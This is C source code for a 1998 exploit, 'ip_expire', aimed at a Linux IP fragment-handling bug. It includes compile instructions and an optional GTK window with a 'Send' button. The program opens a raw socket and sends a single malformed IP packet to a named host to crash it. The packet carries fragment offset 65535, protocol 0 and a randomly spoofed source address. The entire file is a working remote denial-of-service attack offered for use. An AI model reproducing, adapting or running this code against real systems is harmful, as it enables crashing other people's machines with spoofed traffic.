/*
 * ip_expire - exploit the Linux ip_expire() bug
 * Copyright (c) 1998 Ultima
 * 
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 * 
 * I can be contacted via email at <ultima@snicker.emoti.com>
 * 
 * In the spirit of GNU and the FSF, this exploit is bloated with an X-windows
 * interface that uses GTK. Is this the first? =)
 * 
 * Compiling:
 * cc -o ip_expire ip_expire.c -lsock2
 * To compile with the GTK interface, use:
 * cc -o ip_expire ip_expire.c -DUSE_GTK -L/usr/X11R6/lib -lgtk -lgdk -lglib
 * 	-lXext -lX11 -lm -lsock2
 */

#include <stdio.h>
#include <stdlib.h>
#ifdef USE_GTK
#include <gtk/gtk.h>
#endif
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#ifdef USE_GTK
GtkWidget *window;
GtkWidget *entry;
GtkWidget *button;
GtkWidget *box;
GtkWidget *nohost;
GtkWidget *nohostbutton;
GtkWidget *nohostlabel;
#endif
int in_x;
int fd;

unsigned long resolve(char *host) /*{{{*/
{
  struct hostent *he;
  if((he=gethostbyname(host))==NULL)
    {
#ifdef USE_GTK
      if(in_x == 1)
	{
	  gtk_widget_show(nohost);
	  return(0);
	}
#endif
      herror("resolve");
      return(0);
    }
  return(*(unsigned long *)he->h_addr);
}

unsigned short ip_checksum(unsigned short *addr, int len)
{
  int nleft = len;
  unsigned short *w = addr;
  unsigned short answer = 0;
  int sum = 0;
  while(nleft > 1)
    {
      sum += *w++;
      nleft-=2;
    }
  if(nleft == 1)
    {
      *(unsigned char *)(&answer) = *(unsigned char *)w;
      sum += answer;
    }
  sum = (sum >> 16) + (sum & 0xffff);
  answer = ~sum;
  return(answer);
}

void crash(char *host)
{
  unsigned long h;
  struct iphdr iph;
  struct sockaddr_in sin;
  
  h = resolve(host);
  if(h == 0)
    return;
  iph.ihl = 5;
  iph.version = 4;
  iph.tos = 0;
  iph.tot_len = htons(20);
  iph.id = random();
  iph.frag_off = 65535;
  iph.ttl = 255;
  iph.protocol = 0;
  iph.check = 0;
  iph.saddr = random();
  iph.daddr = h;
  sin.sin_port = 0;
  sin.sin_addr.s_addr = h;
  sin.sin_family = AF_INET;
  sendto(fd, &iph, 20, 0, (struct sockaddr *)&sin, 
	 sizeof(struct sockaddr_in));
}

#ifdef USE_GTK
void cb(GtkWidget *w, gpointer d)
{
  char *buf;
  buf = gtk_entry_get_text(GTK_ENTRY(entry));
  if(!buf)
    return;
  if(!*buf)
    return;
  crash(buf);
}

void die(GtkWidget *w, gpointer d)
{
  gtk_main_quit();
}

void okcb(GtkWidget *w, gpointer d)
{
  gtk_widget_hide(nohost);
}
#endif

int main(int argc, char **argv)
{
  int i;
  srand(time(NULL));
  fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if(fd==-1)
    {
      fprintf(stderr, "Error: must have raw socket privaleges to run\r\n");
      exit(1);
    }
#ifdef USE_GTK
  if(getenv("DISPLAY"))
    {
      gtk_init(&argc, &argv);
      in_x = 1;
      window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
      button = gtk_button_new_with_label("Send");
      entry = gtk_entry_new();
      box = gtk_hbox_new(FALSE, 0);
      gtk_signal_connect(GTK_OBJECT(button), "clicked", GTK_SIGNAL_FUNC(cb),
			 NULL);
      gtk_signal_connect(GTK_OBJECT(window), "delete_event",
			 GTK_SIGNAL_FUNC(die), NULL);
      gtk_signal_connect(GTK_OBJECT(window), "destroy",
			 GTK_SIGNAL_FUNC(die), NULL);
      gtk_window_set_title(GTK_WINDOW(window), "Ultima's ip_expire");
      gtk_container_border_width(GTK_CONTAINER(window), 10);
      gtk_container_add(GTK_CONTAINER(window), box);
      gtk_box_pack_start(GTK_BOX(box), entry, TRUE, TRUE, 0);
      gtk_box_pack_end(GTK_BOX(box), button, TRUE, TRUE, 0);
      gtk_widget_show(box);
      gtk_widget_show(entry);
      gtk_widget_show(button);
      gtk_widget_show(window);

      nohost = gtk_dialog_new();
      nohostbutton = gtk_button_new_with_label("OK");
      nohostlabel = gtk_label_new("Unable to resolve host");
      gtk_signal_connect(GTK_OBJECT(nohostbutton), "clicked", 
			 GTK_SIGNAL_FUNC(okcb), NULL);
      gtk_signal_connect(GTK_OBJECT(nohost), "delete_event",
			 GTK_SIGNAL_FUNC(okcb), NULL);
      gtk_signal_connect(GTK_OBJECT(nohost), "destroy",
			 GTK_SIGNAL_FUNC(okcb), NULL);
      gtk_window_set_title(GTK_WINDOW(nohost), "Error");
      gtk_container_border_width(GTK_CONTAINER(nohost), 10);
      gtk_box_pack_start(GTK_BOX(GTK_DIALOG(nohost)->vbox), nohostlabel, TRUE, 
			 TRUE, 0);
      gtk_box_pack_start(GTK_BOX(GTK_DIALOG(nohost)->action_area), 
			 nohostbutton, TRUE, TRUE, 0);
      gtk_widget_show(nohostlabel);
      gtk_widget_show(nohostbutton);
      gtk_main();
      exit(0);
    }
#endif
  if(argc != 2)
    {
      fprintf(stderr, "usage: %s <host>\r\n", argv[0]);
      exit(1);
    }
  crash(argv[1]);
  exit(0);
}
